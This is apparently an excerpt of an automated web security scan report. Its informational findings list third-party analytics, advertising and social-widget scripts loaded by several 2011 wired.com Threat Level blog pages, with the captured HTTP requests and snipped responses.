<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/vf-wikieaks/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.119. http://www.wired.com/threatlevel/2011/01/video-poker/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/video-poker/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/video-poker/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:56:09 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=343
Expires: Wed, 12 Jan 2011 15:32:51 GMT
Date: Wed, 12 Jan 2011 15:27:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/video-poker/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.120. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/ HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://packetstormsecurity.org/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:49:47 +0000
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=389
Expires: Wed, 12 Jan 2011 13:06:05 GMT
Date: Wed, 12 Jan 2011 12:59:36 GMT
Connection: close
Content-Length: 90454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:30 +0000
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:06 GMT
Date: Wed, 12 Jan 2011 15:27:06 GMT
Content-Length: 56148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.122. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:29 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=386
Expires: Wed, 12 Jan 2011 15:33:29 GMT
Date: Wed, 12 Jan 2011 15:27:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.123. http://www.wired.com/threatlevel/author/kimzetter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/author/kimzetter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/author/kimzetter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=331
Expires: Wed, 12 Jan 2011 15:33:34 GMT
Date: Wed, 12 Jan 2011 15:28:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.124. http://www.wired.com/threatlevel/category/announcements/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/announcements/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/announcements/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:11 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=313
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.125. http://www.wired.com/threatlevel/category/atm-hacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/atm-hacking/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/atm-hacking/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:09:34 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=310
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.126. http://www.wired.com/threatlevel/category/bittorrent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/bittorrent/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/bittorrent/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=308
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.127. http://www.wired.com/threatlevel/category/black-hat-conference/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/black-hat-conference/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/black-hat-conference/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=302
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.128. http://www.wired.com/threatlevel/category/bradley-manning/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/bradley-manning/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/bradley-manning/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=257
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.129. http://www.wired.com/threatlevel/category/breaches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/breaches/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/breaches/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.130. http://www.wired.com/threatlevel/category/censorship/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/censorship/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/censorship/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:10:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=298
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
